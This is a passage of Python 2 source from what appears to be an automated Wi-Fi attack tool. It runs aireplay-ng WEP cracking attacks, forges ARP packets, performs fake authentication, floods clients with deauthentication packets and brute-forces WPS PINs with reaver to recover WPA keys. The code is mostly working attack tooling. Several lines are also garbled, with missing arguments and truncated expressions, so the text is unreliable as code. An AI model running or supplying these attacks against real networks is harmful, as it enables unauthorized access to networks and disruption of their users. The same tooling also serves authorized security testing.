- self.RUN_CONFIG.save_cracked(t)
- # Kill processes
- send_interrupt(proc_airodump)
- send_interrupt(proc_aireplay)
- try: os.kill(proc_aireplay, SIGTERM)
- except: pass
- send_interrupt(proc_aircrack)
- # Remove files generated by airodump/aireplay/packetforce
- time.sleep(0.5)
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- remove_file(self.RUN_CONFIG.temp + 'wepkey.txt')
- return True
- # Check if aireplay is still executing
- if proc_aireplay.poll() == None:
- if replaying: print ', '+G+'replaying \r'+W,
- elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r',
- stdout.flush()
- continue
- # At this point, aireplay has stopped
- if attack_num != 1 and attack_num != 2:
- print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
- break # Break out of attack's While loop
- # Check for a .XOR file (we expect one when doing chopchop/fragmentation
- xor_file = ''
- for filename in sorted(os.listdir(self.RUN_CONFIG.temp)):
- if filename.lower().endswith('.xor'): xor_file = self.RUN_CONFIG.temp + filename
- if xor_file == '':
- print '\r %s attack failed: %sunable to generate keystream %s' % (R+current_hms, O, W)
- break
- remove_file(self.RUN_CONFIG.temp + 'arp.cap')
- cmd = ['packetforge-ng',
- '-0',
- '-a',,
- '-h', client_mac,
- '-k', '',
- '-l', '',
- '-y', xor_file,
- '-w', self.RUN_CONFIG.temp + 'arp.cap',
- self.iface]
- proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
- proc_pforge.wait()
- forged_packet = proc_pforge.communicate()[0]
- remove_file(xor_file)
- if forged_packet == None: result = ''
- forged_packet = forged_packet.strip()
- if not forged_packet.find('Wrote packet'):
- print "\r %s attack failed: unable to forget ARP packet %s" % (R+current_hms+O, W)
- break
- # We were able to forge a packet, so let's replay it via aireplay-ng
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--arpreplay',
- '-b',,
- '-r', self.RUN_CONFIG.temp + 'arp.cap', # Used the forged ARP packet
- '-F', # Select the first packet
- self.iface]
- proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
- print '\r %s forged %s! %s... ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
- replaying = True
- # After the attacks, if we are already cracking, wait for the key to be found!
- while started_cracking: # ivs > WEP_CRACK_AT_IVS:
- time.sleep(5)
- # Check number of IVs captured
- csv = self.RUN_CONFIG.RUN_ENGINE.parse_csv(self.RUN_CONFIG.temp + 'wep-01.csv')[0]
- if len(csv) > 0:
- ivs = int(csv[0].data)
- print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s \r" % \
- (G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
- last_ivs = ivs
- stdout.flush()
- # Check if key has been cracked yet.
- if os.path.exists(self.RUN_CONFIG.temp + 'wepkey.txt'):
- # Cracked!
- infile = open(self.RUN_CONFIG.temp + 'wepkey.txt', 'r')
- key ='\n', '')
- infile.close()
- print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked',,, C+key+W)
- self.RUN_CONFIG.WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (,, key))
- self.RUN_CONFIG.WEP_FINDINGS.append('')
- t = Target(, 0, 0, 0, 'WEP',
- t.key = key
- self.RUN_CONFIG.save_cracked(t)
- # Kill processes
- send_interrupt(proc_airodump)
- send_interrupt(proc_aireplay)
- send_interrupt(proc_aircrack)
- # Remove files generated by airodump/aireplay/packetforce
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- remove_file(self.RUN_CONFIG.temp + 'wepkey.txt')
- return True
- # Keyboard interrupt during attack
- except KeyboardInterrupt:
- print R+'\n (^C)'+O+' WEP attack interrupted\n'+W
- send_interrupt(proc_airodump)
- if proc_aireplay != None:
- send_interrupt(proc_aireplay)
- if proc_aircrack != None:
- send_interrupt(proc_aircrack)
- options = []
- selections = []
- if remaining_attacks > 0:
- options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \
- (G, W, (remaining_attacks), 's' if remaining_attacks != 1 else ''))
- selections.append(G+'c'+W)
- options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \
- selections.append(O+'s'+W)
- options.append('%sexit%s the program completely' % (R, W))
- selections.append(R+'e'+W)
- if len(options) > 1:
- # Ask user what they want to do, Store answer in "response"
- print GR+' [+]'+W+' what do you want to do?'
- response = ''
- while response != 'c' and response != 's' and response != 'e':
- for option in options:
- print ' %s' % option
- response = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % (', '.join(selections))).lower()[0]
- else:
- response = 'e'
- if response == 'e' or response == 's':
- # Exit or skip target (either way, stop this attack)
- # Save packets
- save_as = re.sub(r'[^a-zA-Z0-9]', '', + '_' +':', '-') + '.cap'+W
- try: rename(self.RUN_CONFIG.temp + 'wep-01.cap', save_as)
- except OSError: print R+' [!]'+O+' unable to save capture file!'+W
- else: print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W
- # Remove files generated by airodump/aireplay/packetforce
- for filename in os.listdir('.'):
- if filename.startswith('replay_arp-') and filename.endswith('.cap'):
- remove_file(filename)
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- remove_file(self.RUN_CONFIG.temp + 'wepkey.txt')
- print ''
- if response == 'e':
- self.RUN_CONFIG.exit_gracefully(0)
- return
- elif response == 'c':
- # Continue attacks
- # Need to backup temp/wep-01.cap and remove airodump files
- i= 2
- while os.path.exists(self.RUN_CONFIG.temp + 'wep-' + str(i) + '.cap'):
- i += 1
- copy(self.RUN_CONFIG.temp + "wep-01.cap", self.RUN_CONFIG.temp + 'wep-' + str(i) + '.cap')
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- # Need to restart airodump-ng, as it's been interrupted/killed
- proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
- # Say we haven't started cracking yet, so we re-start if needed.
- started_cracking = False
- # Reset IVs counters for proper behavior
- total_ivs += ivs
- ivs = 0
- last_ivs = 0
- # Also need to remember to crack "temp/*.cap" instead of just wep-01.cap
- pass
- if successful:
- print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
- else:
- print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W
- send_interrupt(proc_airodump)
- if proc_aireplay != None:
- send_interrupt(proc_aireplay)
- # Remove files generated by airodump/aireplay/packetforce
- for filename in os.listdir('.'):
- if filename.startswith('replay_arp-') and filename.endswith('.cap'):
- remove_file(filename)
- remove_airodump_files(self.RUN_CONFIG.temp + 'wep')
- remove_file(self.RUN_CONFIG.temp + 'wepkey.txt')
- def wep_fake_auth(self, iface, target, time_to_display):
- """
- Attempt to (falsely) authenticate with a WEP access point.
- Gives 3 seconds to make each 5 authentication attempts.
- Returns True if authentication was successful, False otherwise.
- """
- max_wait = 3 # Time, in seconds, to allow each fake authentication
- max_attempts = 5 # Number of attempts to make
- for fa_index in xrange(1, max_attempts + 1):
- print '\r ',
- print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
- (GR+time_to_display+W, G, W, fa_index, max_attempts),
- stdout.flush()
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '-1', '0', # Fake auth, no delay
- '-a', target.bssid,
- '-T', '1'] # Make 1 attempt
- if target.ssid != '':
- cmd.append('-e')
- cmd.append(target.ssid)
- cmd.append(iface)
- proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
- started = time.time()
- while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
- if time.time() - started > max_wait:
- send_interrupt(proc_fakeauth)
- print R+'failed'+W,
- stdout.flush()
- time.sleep(0.5)
- continue
- result = proc_fakeauth.communicate()[0].lower()
- if result.find('switching to shared key') != -1 or \
- result.find('rejects open system'): pass
- if result.find('association successful') != -1:
- print G+'success!'+W
- return True
- print R+'failed'+W,
- stdout.flush()
- time.sleep(0.5)
- continue
- print ''
- return False
- def get_aireplay_command(self, iface, attack_num, target, clients, client_mac):
- """
- Returns aireplay-ng command line arguments based on parameters.
- """
- cmd = ''
- if attack_num == 0:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--arpreplay',
- '-b', target.bssid,
- '-x', str(self.RUN_CONFIG.WEP_PPS)] # Packets per second
- if client_mac != '':
- cmd.append('-h')
- cmd.append(client_mac)
- elif len(clients) > 0:
- cmd.append('-h')
- cmd.append(clients[0].bssid)
- cmd.append(iface)
- elif attack_num == 1:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--chopchop',
- '-b', target.bssid,
- '-x', str(self.RUN_CONFIG.WEP_PPS), # Packets per second
- '-m', '60', # Minimum packet length (bytes)
- '-n', '82', # Maxmimum packet length
- '-F'] # Automatically choose the first packet
- if client_mac != '':
- cmd.append('-h')
- cmd.append(client_mac)
- elif len(clients) > 0:
- cmd.append('-h')
- cmd.append(clients[0].bssid)
- cmd.append(iface)
- elif attack_num == 2:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--fragment',
- '-b', target.bssid,
- '-x', str(self.RUN_CONFIG.WEP_PPS), # Packets per second
- '-m', '100', # Minimum packet length (bytes)
- '-F'] # Automatically choose the first packet
- if client_mac != '':
- cmd.append('-h')
- cmd.append(client_mac)
- elif len(clients) > 0:
- cmd.append('-h')
- cmd.append(clients[0].bssid)
- cmd.append(iface)
- elif attack_num == 3:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--caffe-latte',
- '-b', target.bssid]
- if len(clients) > 0:
- cmd.append('-h')
- cmd.append(clients[0].bssid)
- cmd.append(iface)
- elif attack_num == 4:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--interactive',
- '-b', target.bssid,
- '-c', 'ff:ff:ff:ff:ff:ff',
- '-t', '1', # Only select packets with ToDS bit set
- '-x', str(self.RUN_CONFIG.WEP_PPS), # Packets per second
- '-F', # Automatically choose the first packet
- '-p', '0841']
- cmd.append(iface)
- elif attack_num == 5:
- if len(clients) == 0:
- print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
- return ''
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--cfrag',
- '-h', clients[0].bssid,
- iface]
- return cmd
- def wep_send_deauths(self, iface, target, clients):
- """
- Sends deauth packets to broadcast and every client.
- """
- # Send deauth to broadcast
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT),
- '-a', target.bssid,
- iface]
- call(cmd, stdout=DN, stderr=DN)
- # Send deauth to every client
- for client in clients:
- cmd = ['aireplay-ng',
- '--ignore-negative-one',
- '--deauth', str(self.RUN_CONFIG.WPA_DEAUTH_COUNT),
- '-a', target.bssid,
- '-h', client.bssid,
- iface]
- call(cmd, stdout=DN, stderr=DN)
- #################
- #################
- class WPSAttack(Attack):
- def __init__(self, iface, target, config):
- self.iface = iface
- = target
- self.RUN_CONFIG = config
- def RunAttack(self):
- '''
- Abstract method for initializing the WPS attack
- '''
- self.attack_wps()
- def EndAttack(self):
- '''
- Abstract method for ending the WPS attack
- '''
- pass
- def attack_wps(self):
- """
- Mounts attack against target on iface.
- Uses "reaver" to attempt to brute force the PIN.
- Once PIN is found, PSK can be recovered.
- PSK is displayed to user and added to WPS_FINDINGS
- """
- print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
- (G, W,' ('')'+W)
- cmd = ['reaver',
- '-i', self.iface,
- '-b',,
- '-o', self.RUN_CONFIG.temp + 'out.out', # Dump output to file to be monitored
- '-a', # auto-detect best options, auto-resumes sessions, doesn't require input!
- '-c',,
- # '--ignore-locks',
- '-vv'] # verbose output
- proc = Popen(cmd, stdout=DN, stderr=DN)
- cracked = False # Flag for when password/pin is found
- percent = 'x.xx%' # Percentage complete
- aps = 'x' # Seconds per attempt
- time_started = time.time()
- last_success = time_started # Time of last successful attempt
- last_pin = '' # Keep track of last pin tried (to detect retries)
- retries = 0 # Number of times we have attempted this PIN
- tries_total = 0 # Number of times we have attempted all pins
- tries = 0 # Number of successful attempts
- pin = ''
- key = ''
- try:
- while not cracked:
- time.sleep(1)
- if proc.poll() != None:
- # Process stopped: Cracked? Failed?
- inf = open(self.RUN_CONFIG.temp + 'out.out', 'r')
- lines ='\n')
- inf.close()
- for line in lines:
- # When it's cracked:
- if line.find("WPS PIN: '") != -1:
- pin = line[line.find("WPS PIN: '") + 10:-1]
- if line.find("WPA PSK: '") != -1:
- key = line[line.find("WPA PSK: '") + 10:-1]
- cracked = True
- break
- if not os.path.exists(self.RUN_CONFIG.temp + 'out.out'): continue
- inf = open(self.RUN_CONFIG.temp + 'out.out', 'r')
- lines ='\n')
- inf.close()
- for line in lines:
- if line.strip() == '': continue
- # Status
- if line.find(' complete @ ') != -1 and len(line) > 8:
- percent = line.split(' ')[1]
- i = line.find(' (')
- j = line.find(' seconds/', i)
- if i != -1 and j != -1: aps = line[i+2:j]
- # PIN attempt
- elif line.find(' Trying pin ') != -1:
- pin = line.strip().split(' ')[-1]
- if pin == last_pin:
- retries += 1
- elif tries_total == 0:
- last_pin = pin
- tries_total -= 1
- else:
- last_success = time.time()
- tries += 1
- last_pin = pin
- retries = 0
- tries_total += 1
- # Warning
- elif line.endswith('10 failed connections in a row'): pass
- # Check for PIN/PSK
- elif line.find("WPS PIN: '") != -1:
- pin = line[line.find("WPS PIN: '") + 10:-1]
- elif line.find("WPA PSK: '") != -1:
- key = line[line.find("WPA PSK: '") + 10:-1]
- cracked = True
- if cracked: break
- print ' %s WPS attack, %s success/ttl,' % \
- (GR+sec_to_hms(time.time()-time_started)+W, \
- G+str(tries)+W+'/'+O+str(tries_total)+W),
- if percent == 'x.xx%' and aps == 'x': print '\r',
- else:
- print '%s complete (%s sec/att) \r' % (G+percent+W, G+aps+W),
- if self.RUN_CONFIG.WPS_TIMEOUT > 0 and (time.time() - last_success) > self.RUN_CONFIG.WPS_TIMEOUT:
- print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (self.RUN_CONFIG.WPS_TIMEOUT)
- print R+' [+]'+W+' skipping %s' % (
- break
- print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (self.RUN_CONFIG.WPS_MAX_RETRIES)
- print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
- print R+' [+]'+W+' skipping %s' % (
- break
- if self.RUN_CONFIG.WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < self.RUN_CONFIG.WPS_RATIO_THRESHOLD:
- print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (self.RUN_CONFIG.WPS_RATIO_THRESHOLD)
- print R+' [+]'+W+' skipping %s' % (
- break
- stdout.flush()
- # Clear out output file if bigger than 1mb
- inf = open(self.RUN_CONFIG.temp + 'out.out', 'w')
- inf.close()
- # End of big "while not cracked" loop
- if cracked:
- if pin != '': print GR+'\n\n [+]'+G+' PIN found: %s' % (C+pin+W)
- if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
- self.RUN_CONFIG.WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (, C+key+W, C+pin+W))
- self.RUN_CONFIG.WPA_FINDINGS.append('')
- t = Target(, 0,0,0, 'WPA',
- t.key = key
- t.wps = pin
- self.RUN_CONFIG.save_cracked(t)
- except KeyboardInterrupt:
- print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
- if attack_interrupted_prompt():
- send_interrupt(proc)
- print ''
- self.RUN_CONFIG.exit_gracefully(0)
- send_interrupt(proc)
- return cracked
- if __name__ == '__main__':
- RUN_CONFIG = RunConfiguration()
- try:
- banner(RUN_CONFIG)
- engine = RunEngine(RUN_CONFIG)
- engine.Start()
- #main(RUN_CONFIG)
- except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
- except EOFError: print R+'\n (^D)'+O+' interrupted\n'+W
- RUN_CONFIG.exit_gracefully(0)
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